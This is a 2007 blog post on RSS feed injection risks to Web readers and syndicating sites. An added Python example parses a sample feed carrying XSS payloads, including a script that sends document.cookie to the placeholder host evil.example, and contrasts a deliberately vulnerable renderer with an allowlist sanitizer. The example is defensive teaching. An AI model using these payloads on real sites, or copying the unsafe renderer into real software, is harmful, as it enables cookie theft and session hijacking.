Sunday, November 25, 2007

RSS Feed Injection: Risk of Both

Web Reader Risks
People typically subscribe to a Web-based feed with a browser, a local
(desktop) client, or an online aggregator. Which zone an injected feed item
runs in depends on how the application renders it. A desktop reader that
displays feed HTML inside a privileged local zone exposes the local machine;
online services such as bloglines.com or Google Reader render the item inside
their own Web origin and fall into the remote-zone risk category. A Web-based
viewer that fails to sanitize feed content hands the attacker script execution
in the viewer site's origin, which is equivalent to a stored Cross-Site
Scripting flaw: cookie theft, session hijacking, and any action the logged-in
user can perform on that site.

Web Site Risks

The potential impact of a feed-based attack grows considerably when the
controlled feed is syndicated by other Web sites. If an attacker-controlled
feed is published on Site A and republished by Site B, the attacker's items
become part of Site B's content. If Site B renders feed items without
sanitizing them, the attacker now runs script in Site B's remote zone and
against Site B's users, even though Site B never hosted the malicious feed
itself. Because feeds are routinely re-aggregated, the injected item can
propagate from Site B into further feeds and on to subscribers who forward it
elsewhere, rapidly expanding the base of possible victims. The trust boundary
therefore sits at every point where feed content is rendered, not only at the
feed's original source.
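The following is an added example, not code from the original post: a small Python script that parses a constructed RSS 2.0 feed in which one item carries the kind of payload described in both sections above (a script in the description, an event handler in the title, and `javascript:` links), then renders it twice. `render_vulnerable` does what an unsafe Web-based reader does and drops the decoded feed HTML straight into its own page; `render_safe` escapes titles, rejects non-http(s) links and passes descriptions through an allowlist sanitizer. The same `render_safe` step is what Site B in the syndication scenario must apply before republishing, because it receives exactly the same decoded HTML. The host names `site-a.example` and `evil.example` and the feed contents are hypothetical.

```python
import html
import urllib.parse
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Constructed sample feed (hypothetical hosts, not from the original post).
# RSS carries entity-encoded HTML in <title>/<description>; a reader decodes
# it, so the second item's payload arrives as live markup.
SAMPLE_FEED = """<rss version="2.0">
  <channel>
    <title>Site A news</title>
    <item>
      <title>Benign post</title>
      <link>http://site-a.example/post/1</link>
      <description>Plain &lt;b&gt;bold&lt;/b&gt; text.</description>
    </item>
    <item>
      <title>&lt;img src=x onerror="alert(document.cookie)"&gt;Title</title>
      <link>javascript:alert(document.cookie)</link>
      <description>&lt;script&gt;new Image().src='http://evil.example/?c='+document.cookie&lt;/script&gt;&lt;a href="javascript:alert(1)"&gt;Read more&lt;/a&gt;</description>
    </item>
  </channel>
</rss>
"""

ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p"}


def safe_url(url):
    """Accept only http(s) URLs. Feed <link> values and <a href> attributes in
    descriptions are attacker-controlled and may carry javascript: URLs."""
    url = (url or "").strip()
    scheme = urllib.parse.urlsplit(url).scheme.lower()
    return url if scheme in ("http", "https") else None


class AllowlistSanitizer(HTMLParser):
    """Rebuild an HTML fragment keeping only ALLOWED_TAGS with no attributes
    (except a validated href on <a>). Everything else (script, style, img,
    comments, on* handlers) is dropped and text is re-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside <script>/<style> content

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
        elif tag == "a":
            href = safe_url(dict(attrs).get("href"))
            self.out.append(f'<a href="{html.escape(href, quote=True)}">' if href else "<a>")
        elif tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")  # attributes intentionally discarded

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
        elif tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=True))


def sanitize_html(fragment):
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def parse_items(feed_xml):
    """Return the <item> elements of an RSS 2.0 feed as dicts. Entity-encoded
    HTML comes back decoded, i.e. as live markup. (Feed XML is untrusted too:
    production code should parse it with defusedxml rather than plain ET.)"""
    root = ET.fromstring(feed_xml)
    return [
        {
            "title": item.findtext("title", default=""),
            "link": item.findtext("link", default=""),
            "description": item.findtext("description", default=""),
        }
        for item in root.iter("item")
    ]


def render_vulnerable(items):
    """An unsafe Web-based reader: trusts the feed and injects the decoded HTML
    into its own page, so the payload runs in the reader site's origin."""
    return "\n".join(
        f'<h2><a href="{i["link"]}">{i["title"]}</a></h2><div>{i["description"]}</div>'
        for i in items
    )


def render_safe(items):
    """Hardened rendering: escape titles, keep only http(s) links, and pass
    descriptions through the allowlist sanitizer."""
    out = []
    for i in items:
        title = html.escape(i["title"], quote=True)
        link = safe_url(i["link"])
        heading = (
            f'<h2><a href="{html.escape(link, quote=True)}">{title}</a></h2>'
            if link else f"<h2>{title}</h2>"
        )
        out.append(heading + f"<div>{sanitize_html(i['description'])}</div>")
    return "\n".join(out)


if __name__ == "__main__":
    items = parse_items(SAMPLE_FEED)
    print("--- vulnerable ---\n" + render_vulnerable(items))
    print("--- safe ---\n" + render_safe(items))
```

The sanitizer is deliberately minimal (it does not balance unclosed tags, for instance); in production use a maintained HTML sanitizer with the same allowlist approach. The point it makes is that the decision to trust feed HTML is made by whoever renders it, so a Web site syndicating Site A's feed must sanitize just as a feed reader does.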

